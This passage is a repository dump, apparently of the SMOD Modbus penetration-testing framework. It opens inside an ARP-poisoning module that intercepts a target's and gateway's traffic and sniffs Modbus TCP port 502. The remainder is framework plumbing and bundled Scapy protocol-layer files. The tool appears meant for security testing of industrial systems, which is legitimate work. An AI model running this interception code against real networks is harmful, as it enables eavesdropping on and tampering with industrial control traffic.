hwsrc=gatway_mac), count=3) 68 | with open('/proc/sys/net/ipv4/ip_forward', 'w') as ipf: 69 | ipf.write('0\n') 70 | os._exit(0) 71 | def get_mac(ip_address): 72 | ans,unasn = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip_address),timeout=2,retry=10) 73 | ans.res 74 | return ans.res[0][1][Ether].src 75 | 76 | 77 | 78 | target_ip = self.options['Slave'][0] 79 | gatway_ip = self.options['Master'][0] 80 | 81 | 82 | gatway_mac = get_mac(gatway_ip) 83 | if(gatway_mac == None): 84 | self.printLine('[-] Failed to get Master MAC',bcolors.WARNING) 85 | sys.exit(0) 86 | else: 87 | self.printLine('[+] Master MAC: '+gatway_mac,bcolors.OKGREEN) 88 | 89 | target_mac = get_mac(target_ip) 90 | if(target_mac == None): 91 | self.printLine('[-] Failed to get Slave MAC',bcolors.WARNING) 92 | os._exit(0) 93 | else: 94 | self.printLine('[+] Slave MAC: '+target_mac,bcolors.OKGREEN) 95 | 96 | def signal_handler(signal, frame): 97 | restore_target(gatway_ip,gatway_mac,target_ip,target_mac) 98 | 99 | signal.signal(signal.SIGINT, signal_handler) 100 | poison_thread = threading.Thread(target = poison_target,args=(gatway_ip,gatway_mac,target_ip,target_mac)) 101 | poison_thread.start() 102 | 103 | sniff(filter='tcp port 502', prn=arp_callback, store=1) 104 | 105 | 106 | 107 | 108 | 109 | -------------------------------------------------------------------------------- /smod/Application/modules/modbus/sniff/arp.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/Application/modules/modbus/sniff/arp.pyc -------------------------------------------------------------------------------- /smod/Output/output: -------------------------------------------------------------------------------- 1 | #output files 2 | -------------------------------------------------------------------------------- /smod/System/Core/Banner.py: -------------------------------------------------------------------------------- 1 | from Colors import bcolors 2 | 3 | def Banner(version,modulesNum): 4 | print ' _______ ' 5 | print '< SMOD >' 6 | print ' ------- ' 7 | print ' \ ^__^' 8 | print ' \ (xx)\_______' 9 | print ' (__)\\ )\\/\\' 10 | print ' U ||----w |' 11 | print ' || ||' 12 | print ' '*10 + '--=' + bcolors.OKBLUE + '[' + bcolors.ENDC + bcolors.BOLD + 'MODBUS' + bcolors.ENDC +' Penetration Test FrameWork' 13 | print ' '*7 + '--+--=' + bcolors.OKBLUE + '[' + bcolors.ENDC + 'Version : ' + bcolors.OKGREEN + bcolors.BOLD + version + bcolors.ENDC + bcolors.ENDC 14 | print ' '*7 + '--+--=' + bcolors.OKBLUE + '[' + bcolors.ENDC + 'Modules : ' + bcolors.OKGREEN + bcolors.BOLD + str(modulesNum) + bcolors.ENDC + bcolors.ENDC 15 | print ' '*7 + '--+--=' + bcolors.OKBLUE + '[' + bcolors.ENDC + 'Coder : ' + bcolors.OKGREEN + bcolors.BOLD + 'Farzin Enddo' + bcolors.ENDC + bcolors.ENDC 16 | print ' '*10 + '--=' + bcolors.OKBLUE + '[' + bcolors.ENDC + 'github : ' + bcolors.OKGREEN + bcolors.BOLD + 'www.github.com/enddo' + bcolors.ENDC + bcolors.ENDC 17 | print ' ' -------------------------------------------------------------------------------- /smod/System/Core/Banner.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/System/Core/Banner.pyc -------------------------------------------------------------------------------- /smod/System/Core/Colors.py: -------------------------------------------------------------------------------- 1 | class bcolors: 2 | HEADER = '\033[95m' 3 | OKBLUE = '\033[94m' 4 | OKGREEN = '\033[92m' 5 | WARNING = '\033[93m' 6 | FAIL = '\033[91m' 7 | ENDC = '\033[0m' 8 | BOLD = '\033[1m' 9 | UNDERLINE = '\033[4m' -------------------------------------------------------------------------------- /smod/System/Core/Colors.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/System/Core/Colors.pyc -------------------------------------------------------------------------------- /smod/System/Core/Global.py: -------------------------------------------------------------------------------- 1 | import os 2 | import sys 3 | 4 | mainPath = os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir, os.path.pardir)) 5 | modulesPath = os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir, os.path.pardir)) + '/Application/modules/' 6 | VERSION = '1.0.4' 7 | pluginNumber = 0 8 | modules = None 9 | POINTER = None 10 | THREADS = list() 11 | timeout = 1 12 | -------------------------------------------------------------------------------- /smod/System/Core/Global.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/System/Core/Global.pyc -------------------------------------------------------------------------------- /smod/System/Core/Interface.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/System/Core/Interface.pyc -------------------------------------------------------------------------------- /smod/System/Core/Loader.py: -------------------------------------------------------------------------------- 1 | import os 2 | import imp 3 | 4 | class plugins: 5 | pluginTree = list() 6 | modules = dict() 7 | def __init__(self,path): 8 | self.path = path 9 | def crawler(self): 10 | for top,dirs,files in os.walk(self.path): 11 | for sub in files: 12 | if(sub.endswith('.py')): 13 | self.pluginTree.append(os.path.join(top,sub).replace(self.path,'').replace('.py','').split('/')) 14 | 15 | def load(self): 16 | for plugin in self.pluginTree: 17 | name = plugin[-1] 18 | item = '/'.join(plugin) 19 | self.modules.update({item:imp.load_source(name, self.path + item + '.py').Module()}) 20 | 21 | -------------------------------------------------------------------------------- /smod/System/Core/Loader.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/System/Core/Loader.pyc -------------------------------------------------------------------------------- /smod/System/Core/Modbus.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/System/Core/Modbus.pyc -------------------------------------------------------------------------------- /smod/System/Core/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/System/Core/__init__.py -------------------------------------------------------------------------------- /smod/System/Core/__init__.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/System/Core/__init__.pyc -------------------------------------------------------------------------------- /smod/System/Lib/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/System/Lib/__init__.py -------------------------------------------------------------------------------- /smod/System/Lib/__init__.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/System/Lib/__init__.pyc -------------------------------------------------------------------------------- /smod/System/Lib/ipcalc.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/System/Lib/ipcalc.pyc -------------------------------------------------------------------------------- /smod/System/Lib/prettytable.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/System/Lib/prettytable.pyc -------------------------------------------------------------------------------- /smod/System/Lib/scapy/__init__.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | """ 7 | Scapy: create, send, sniff, dissect and manipulate network packets. 8 | 9 | Usable either from an interactive console or as a Python library. 10 | http://www.secdev.org/projects/scapy 11 | """ 12 | 13 | if __name__ == "__main__": 14 | from scapy.main import interact 15 | interact() 16 | -------------------------------------------------------------------------------- /smod/System/Lib/scapy/__init__.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/System/Lib/scapy/__init__.pyc -------------------------------------------------------------------------------- /smod/System/Lib/scapy/all.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | """ 7 | Aggregate top level objects from all Scapy modules. 8 | """ 9 | 10 | from base_classes import * 11 | from config import * 12 | from dadict import * 13 | from data import * 14 | from error import * 15 | from themes import * 16 | from arch import * 17 | 18 | from plist import * 19 | from fields import * 20 | from packet import * 21 | from asn1fields import * 22 | from asn1packet import * 23 | 24 | from utils import * 25 | from route import * 26 | if conf.ipv6_enabled: 27 | from utils6 import * 28 | from route6 import * 29 | from sendrecv import * 30 | from supersocket import * 31 | from volatile import * 32 | from as_resolvers import * 33 | 34 | from ansmachine import * 35 | from automaton import * 36 | from autorun import * 37 | 38 | from main import * 39 | 40 | from layers.all import * 41 | 42 | from asn1.asn1 import * 43 | from asn1.ber import * 44 | from asn1.mib import * 45 | 46 | from crypto import * 47 | 48 | from pipetool import * 49 | from scapypipes import * 50 | -------------------------------------------------------------------------------- /smod/System/Lib/scapy/all.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/System/Lib/scapy/all.pyc -------------------------------------------------------------------------------- /smod/System/Lib/scapy/ansmachine.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/System/Lib/scapy/ansmachine.pyc -------------------------------------------------------------------------------- /smod/System/Lib/scapy/arch/__init__.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | """ 7 | Operating system specific functionality. 8 | """ 9 | 10 | 11 | import sys,os,socket 12 | from scapy.error import * 13 | import scapy.config 14 | 15 | try: 16 | import Gnuplot 17 | GNUPLOT=1 18 | except ImportError: 19 | log_loading.info("Can't import python gnuplot wrapper . Won't be able to plot.") 20 | GNUPLOT=0 21 | 22 | try: 23 | import pyx 24 | PYX=1 25 | except ImportError: 26 | log_loading.info("Can't import PyX. Won't be able to use psdump() or pdfdump().") 27 | PYX=0 28 | 29 | 30 | def str2mac(s): 31 | return ("%02x:"*6)[:-1] % tuple(map(ord, s)) 32 | 33 | 34 | 35 | def get_if_addr(iff): 36 | return socket.inet_ntoa(get_if_raw_addr(iff)) 37 | 38 | def get_if_hwaddr(iff): 39 | addrfamily, mac = get_if_raw_hwaddr(iff) 40 | if addrfamily in [ARPHDR_ETHER,ARPHDR_LOOPBACK]: 41 | return str2mac(mac) 42 | else: 43 | raise Scapy_Exception("Unsupported address family (%i) for interface [%s]" % (addrfamily,iff)) 44 | 45 | 46 | LINUX=sys.platform.startswith("linux") 47 | OPENBSD=sys.platform.startswith("openbsd") 48 | FREEBSD=sys.platform.startswith("freebsd") 49 | NETBSD = sys.platform.startswith("netbsd") 50 | DARWIN=sys.platform.startswith("darwin") 51 | SOLARIS=sys.platform.startswith("sunos") 52 | WINDOWS=sys.platform.startswith("win32") 53 | 54 | X86_64 = not WINDOWS and (os.uname()[4] == 'x86_64') 55 | 56 | 57 | # Next step is to import following architecture specific functions: 58 | # def get_if_raw_hwaddr(iff) 59 | # def get_if_raw_addr(iff): 60 | # def get_if_list(): 61 | # def get_working_if(): 62 | # def attach_filter(s, filter): 63 | # def set_promisc(s,iff,val=1): 64 | # def read_routes(): 65 | # def get_if(iff,cmd): 66 | # def get_if_index(iff): 67 | 68 | 69 | 70 | if LINUX: 71 | from linux import * 72 | if scapy.config.conf.use_pcap or scapy.config.conf.use_dnet: 73 | from pcapdnet import * 74 | elif OPENBSD or FREEBSD or NETBSD or DARWIN: 75 | from bsd import * 76 | elif SOLARIS: 77 | from solaris import * 78 | elif WINDOWS: 79 | from windows import * 80 | 81 | if scapy.config.conf.iface is None: 82 | scapy.config.conf.iface = LOOPBACK_NAME 83 | 84 | 85 | def get_if_raw_addr6(iff): 86 | """ 87 | Returns the main global unicast address associated with provided 88 | interface, in network format. If no global address is found, None 89 | is returned. 90 | """ 91 | r = filter(lambda x: x[2] == iff and x[1] == IPV6_ADDR_GLOBAL, in6_getifaddr()) 92 | if len(r) == 0: 93 | return None 94 | else: 95 | r = r[0][0] 96 | return inet_pton(socket.AF_INET6, r) 97 | -------------------------------------------------------------------------------- /smod/System/Lib/scapy/arch/__init__.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/System/Lib/scapy/arch/__init__.pyc -------------------------------------------------------------------------------- /smod/System/Lib/scapy/arch/bsd.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | """ 7 | Support for BSD-like operating systems such as FreeBSD, OpenBSD and Mac OS X. 8 | """ 9 | 10 | LOOPBACK_NAME="lo0" 11 | 12 | from unix import * 13 | -------------------------------------------------------------------------------- /smod/System/Lib/scapy/arch/bsd.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/System/Lib/scapy/arch/bsd.pyc -------------------------------------------------------------------------------- /smod/System/Lib/scapy/arch/pcapdnet.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/System/Lib/scapy/arch/pcapdnet.pyc -------------------------------------------------------------------------------- /smod/System/Lib/scapy/arch/solaris.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | """ 7 | Customization for the Solaris operation system. 8 | """ 9 | 10 | # IPPROTO_GRE is missing on Solaris 11 | import socket 12 | socket.IPPROTO_GRE = 47 13 | 14 | LOOPBACK_NAME="lo0" 15 | 16 | from unix import * 17 | -------------------------------------------------------------------------------- /smod/System/Lib/scapy/arch/unix.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/System/Lib/scapy/arch/unix.pyc -------------------------------------------------------------------------------- /smod/System/Lib/scapy/as_resolvers.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/System/Lib/scapy/as_resolvers.pyc -------------------------------------------------------------------------------- /smod/System/Lib/scapy/asn1/__init__.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | """ 7 | Package holding ASN.1 related modules. 8 | """ 9 | 10 | # We do not import mib.py because it is more bound to scapy and 11 | # less prone to be used in a standalone fashion 12 | __all__ = ["asn1","ber"] 13 | -------------------------------------------------------------------------------- /smod/System/Lib/scapy/asn1/__init__.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/System/Lib/scapy/asn1/__init__.pyc -------------------------------------------------------------------------------- /smod/System/Lib/scapy/asn1/asn1.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/System/Lib/scapy/asn1/asn1.pyc -------------------------------------------------------------------------------- /smod/System/Lib/scapy/asn1/ber.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/System/Lib/scapy/asn1/ber.pyc -------------------------------------------------------------------------------- /smod/System/Lib/scapy/asn1/mib.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/System/Lib/scapy/asn1/mib.pyc -------------------------------------------------------------------------------- /smod/System/Lib/scapy/asn1fields.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/System/Lib/scapy/asn1fields.pyc -------------------------------------------------------------------------------- /smod/System/Lib/scapy/asn1packet.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | """ 7 | Packet holding data in Abstract Syntax Notation (ASN.1). 8 | """ 9 | 10 | from packet import * 11 | 12 | class ASN1_Packet(Packet): 13 | ASN1_root = None 14 | ASN1_codec = None 15 | def init_fields(self): 16 | flist = self.ASN1_root.get_fields_list() 17 | self.do_init_fields(flist) 18 | self.fields_desc = flist 19 | def self_build(self): 20 | if self.raw_packet_cache is not None: 21 | return self.raw_packet_cache 22 | return self.ASN1_root.build(self) 23 | def do_dissect(self, x): 24 | return self.ASN1_root.dissect(self, x) 25 | 26 | 27 | -------------------------------------------------------------------------------- /smod/System/Lib/scapy/asn1packet.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/System/Lib/scapy/asn1packet.pyc -------------------------------------------------------------------------------- /smod/System/Lib/scapy/automaton.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/System/Lib/scapy/automaton.pyc -------------------------------------------------------------------------------- /smod/System/Lib/scapy/autorun.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/System/Lib/scapy/autorun.pyc -------------------------------------------------------------------------------- /smod/System/Lib/scapy/base_classes.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/System/Lib/scapy/base_classes.pyc -------------------------------------------------------------------------------- /smod/System/Lib/scapy/config.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/System/Lib/scapy/config.pyc -------------------------------------------------------------------------------- /smod/System/Lib/scapy/contrib/__init__.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | """ 7 | Package of contrib modules that have to be loaded explicitly. 8 | """ 9 | -------------------------------------------------------------------------------- /smod/System/Lib/scapy/contrib/avs.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | 3 | # http://trac.secdev.org/scapy/ticket/82 4 | 5 | # scapy.contrib.description = AVS WLAN Monitor Header 6 | # scapy.contrib.status = loads 7 | 8 | from scapy.packet import * 9 | from scapy.fields import * 10 | from scapy.layers.dot11 import * 11 | 12 | AVSWLANPhyType = { 0 : "Unknown", 13 | 1 : "FHSS 802.11 '97", 14 | 2 : "DSSS 802.11 '97", 15 | 3 : "IR Baseband", 16 | 4 : "DSSS 802.11b", 17 | 5 : "PBCC 802.11b", 18 | 6 : "OFDM 802.11g", 19 | 7 : "PBCC 802.11g", 20 | 8 : "OFDM 802.11a" } 21 | 22 | AVSWLANEncodingType = { 0 : "Unknown", 23 | 1 : "CCK", 24 | 2 : "PBCC", 25 | 3 : "OFDM"} 26 | 27 | AVSWLANSSIType = { 0 : "None", 28 | 1 : "Normalized RSSI", 29 | 2 : "dBm", 30 | 3 : "Raw RSSI"} 31 | 32 | AVSWLANPreambleType = { 0 : "Unknown", 33 | 1 : "Short", 34 | 2 : "Long" } 35 | 36 | 37 | class AVSWLANHeader(Packet): 38 | """ iwpriv eth1 set_prismhdr 1 """ 39 | name = "AVS WLAN Monitor Header" 40 | fields_desc = [ IntField("version",1), 41 | IntField("len",64), 42 | LongField("mactime",0), 43 | LongField("hosttime",0), 44 | IntEnumField("phytype",0, AVSWLANPhyType), 45 | IntField("channel",0), 46 | IntField("datarate",0), 47 | IntField("antenna",0), 48 | IntField("priority",0), 49 | IntEnumField("ssi_type",0, AVSWLANSSIType), 50 | SignedIntField("ssi_signal",0), 51 | SignedIntField("ssi_noise",0), 52 | IntEnumField("preamble",0, AVSWLANPreambleType), 53 | IntEnumField("encoding",0, AVSWLANEncodingType), 54 | ] 55 | 56 | bind_layers(AVSWLANHeader, Dot11) 57 | 58 | -------------------------------------------------------------------------------- /smod/System/Lib/scapy/contrib/carp.py: -------------------------------------------------------------------------------- 1 | 2 | # scapy.contrib.description = CARP 3 | # scapy.contrib.status = loads 4 | 5 | from scapy.packet import * 6 | from scapy.layers.inet import IP 7 | from scapy.fields import BitField, ByteField, XShortField, IntField, XIntField 8 | from scapy.utils import checksum 9 | import struct, hmac, hashlib 10 | 11 | class CARP(Packet): 12 | name = "CARP" 13 | fields_desc = [ BitField("version", 4, 4), 14 | BitField("type", 4, 4), 15 | ByteField("vhid", 1), 16 | ByteField("advskew", 0), 17 | ByteField("authlen", 0), 18 | ByteField("demotion", 0), 19 | ByteField("advbase", 0), 20 | XShortField("chksum", 0), 21 | XIntField("counter1", 0), 22 | XIntField("counter2", 0), 23 | XIntField("hmac1", 0), 24 | XIntField("hmac2", 0), 25 | XIntField("hmac3", 0), 26 | XIntField("hmac4", 0), 27 | XIntField("hmac5", 0) 28 | ] 29 | 30 | def post_build(self, pkt, pay): 31 | if self.chksum == None: 32 | pkt = pkt[:6] + struct.pack("!H", checksum(pkt)) + pkt[8:] 33 | 34 | return pkt 35 | 36 | def build_hmac_sha1(pkt, pw = '\0' * 20, ip4l = [], ip6l = []): 37 | if not pkt.haslayer(CARP): 38 | return None 39 | 40 | p = pkt[CARP] 41 | h = hmac.new(pw, digestmod = hashlib.sha1) 42 | # XXX: this is a dirty hack. it needs to pack version and type into a single 8bit field 43 | h.update('\x21') 44 | # XXX: mac addy if different from special link layer. comes before vhid 45 | h.update(struct.pack('!B', p.vhid)) 46 | 47 | sl = [] 48 | for i in ip4l: 49 | # sort ips from smallest to largest 50 | sl.append(inet_aton(i)) 51 | sl.sort() 52 | 53 | for i in sl: 54 | h.update(i) 55 | 56 | # XXX: do ip6l sorting 57 | 58 | return h.digest() 59 | 60 | """ 61 | XXX: Usually CARP is multicast to 224.0.0.18 but because of virtual setup, it'll 62 | be unicast between nodes. Uncomment the following line for normal use 63 | bind_layers(IP, CARP, proto=112, dst='224.0.0.18') 64 | """ 65 | bind_layers(IP, CARP, proto=112) 66 | -------------------------------------------------------------------------------- /smod/System/Lib/scapy/contrib/chdlc.py: -------------------------------------------------------------------------------- 1 | # http://trac.secdev.org/scapy/ticket/88 2 | 3 | # scapy.contrib.description = Cisco HDLC and SLARP 4 | # scapy.contrib.status = loads 5 | 6 | # This layer is based on information from http://www.nethelp.no/net/cisco-hdlc.txt 7 | 8 | from scapy.packet import * 9 | from scapy.fields import * 10 | from scapy.layers.l2 import * 11 | from scapy.layers.inet import * 12 | from scapy.layers.inet6 import * 13 | 14 | class CHDLC(Packet): 15 | name = "Cisco HDLC" 16 | fields_desc = [ ByteEnumField("address", 0x0f, {0x0f : "unicast", 0x8f :"multicast"}), 17 | ByteField("control", 0), 18 | XShortField("proto", 0x0800)] 19 | 20 | class SLARP(Packet): 21 | name = "SLARP" 22 | fields_desc = [ IntEnumField("type", 2, {0 : "request", 1 : "reply", 2 :"line keepalive"}), 23 | ConditionalField(IPField("address", "192.168.0.1"), 24 | lambda pkt : pkt.type == 0 or pkt.type == 1), 25 | ConditionalField(IPField("mask", "255.255.255.0"), 26 | lambda pkt : pkt.type == 0 or pkt.type == 1), 27 | ConditionalField(XShortField("unused", 0), 28 | lambda pkt : pkt.type == 0 or pkt.type == 1), 29 | ConditionalField(IntField("mysequence", 0), 30 | lambda pkt : pkt.type == 2), 31 | ConditionalField(IntField("yoursequence", 0), 32 | lambda pkt : pkt.type == 2), 33 | ConditionalField(XShortField("reliability", 0xffff), 34 | lambda pkt : pkt.type == 2)] 35 | 36 | bind_layers( CHDLC, Dot3, proto=0x6558) 37 | bind_layers( CHDLC, IP, proto=0x800) 38 | bind_layers( CHDLC, IPv6, proto=0x86dd) 39 | bind_layers( CHDLC, SLARP, proto=0x8035) 40 | bind_layers( CHDLC, STP, proto=0x4242) 41 | 42 | conf.l2types.register(104, CHDLC) 43 | -------------------------------------------------------------------------------- /smod/System/Lib/scapy/contrib/etherip.py: -------------------------------------------------------------------------------- 1 | 2 | # http://trac.secdev.org/scapy/ticket/297 3 | 4 | # scapy.contrib.description = EtherIP 5 | # scapy.contrib.status = loads 6 | 7 | from scapy.fields import BitField 8 | from scapy.packet import Packet, bind_layers 9 | from scapy.layers.inet import IP 10 | from scapy.layers.l2 import Ether 11 | 12 | class EtherIP(Packet): 13 | name = "EtherIP / RFC 3378" 14 | fields_desc = [ BitField("version", 3, 4), 15 | BitField("reserved", 0, 12)] 16 | 17 | bind_layers( IP, EtherIP, frag=0, proto=0x61) 18 | bind_layers( EtherIP, Ether) 19 | 20 | -------------------------------------------------------------------------------- /smod/System/Lib/scapy/contrib/mpls.py: -------------------------------------------------------------------------------- 1 | # http://trac.secdev.org/scapy/ticket/31 2 | 3 | # scapy.contrib.description = MPLS 4 | # scapy.contrib.status = loads 5 | 6 | from scapy.packet import Packet,bind_layers 7 | from scapy.fields import BitField,ByteField 8 | from scapy.layers.l2 import Ether 9 | 10 | class MPLS(Packet): 11 | name = "MPLS" 12 | fields_desc = [ BitField("label", 3, 20), 13 | BitField("cos", 0, 3), 14 | BitField("s", 1, 1), 15 | ByteField("ttl", 0) ] 16 | 17 | bind_layers(Ether, MPLS, type=0x8847) 18 | -------------------------------------------------------------------------------- /smod/System/Lib/scapy/contrib/ppi.py: -------------------------------------------------------------------------------- 1 | ## This file is (hopefully) part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## 4 | ## This program is published under a GPLv2 license 5 | 6 | # scapy.contrib.description = PPI 7 | # scapy.contrib.status = loads 8 | 9 | 10 | """ 11 | PPI (Per-Packet Information). 12 | """ 13 | import logging,struct 14 | from scapy.config import conf 15 | from scapy.packet import * 16 | from scapy.fields import * 17 | from scapy.layers.l2 import Ether 18 | from scapy.layers.dot11 import Dot11 19 | 20 | # Dictionary to map the TLV type to the class name of a sub-packet 21 | _ppi_types = {} 22 | def addPPIType(id, value): 23 | _ppi_types[id] = value 24 | def getPPIType(id, default="default"): 25 | return _ppi_types.get(id, _ppi_types.get(default, None)) 26 | 27 | 28 | # Default PPI Field Header 29 | class PPIGenericFldHdr(Packet): 30 | name = "PPI Field Header" 31 | fields_desc = [ LEShortField('pfh_type', 0), 32 | FieldLenField('pfh_length', None, length_of="value", fmt='= 4: 47 | t,pfh_len = struct.unpack(" pfh_len): 56 | out.payload.payload = conf.padding_layer(p[pfh_len:]) 57 | elif (len(p) > pfh_len): 58 | out.payload = conf.padding_layer(p[pfh_len:]) 59 | 60 | else: 61 | out = conf.raw_layer(p, **kargs) 62 | return out 63 | 64 | 65 | 66 | 67 | class PPI(Packet): 68 | name = "PPI Packet Header" 69 | fields_desc = [ ByteField('pph_version', 0), 70 | ByteField('pph_flags', 0), 71 | FieldLenField('pph_len', None, length_of="PPIFieldHeaders", fmt=" 4 | ## This program is published under a GPLv2 license 5 | 6 | # scapy.contrib.description = PPI CACE 7 | # scapy.contrib.status = loads 8 | 9 | """ 10 | CACE PPI types 11 | """ 12 | import logging,struct 13 | from scapy.config import conf 14 | from scapy.packet import * 15 | from scapy.fields import * 16 | from scapy.layers.l2 import Ether 17 | from scapy.layers.dot11 import Dot11 18 | from scapy.contrib.ppi import * 19 | 20 | PPI_DOT11COMMON = 2 21 | PPI_DOT11NMAC = 3 22 | PPI_DOT11NMACPHY = 4 23 | PPI_SPECTRUMMAP = 5 24 | PPI_PROCESSINFO = 6 25 | PPI_CAPTUREINFO = 7 26 | PPI_AGGREGATION = 8 27 | PPI_DOT3 = 9 28 | 29 | # PPI 802.11 Common Field Header Fields 30 | class dBmByteField(Field): 31 | def __init__(self, name, default): 32 | Field.__init__(self, name, default, "b") 33 | def i2repr(self, pkt, val): 34 | if (val != None): 35 | val = "%4d dBm" % val 36 | return val 37 | 38 | class PPITSFTField(LELongField): 39 | def i2h(self, pkt, val): 40 | flags = 0 41 | if (pkt): 42 | flags = pkt.getfieldval("Pkt_Flags") 43 | if not flags: 44 | flags = 0 45 | if (flags & 0x02): 46 | scale = 1e-3 47 | else: 48 | scale = 1e-6 49 | tout = scale * float(val) 50 | return tout 51 | def h2i(self, pkt, val): 52 | scale = 1e6 53 | if pkt: 54 | flags = pkt.getfieldval("Pkt_Flags") 55 | if flags: 56 | if (flags & 0x02): 57 | scale = 1e3 58 | tout = int((scale * val) + 0.5) 59 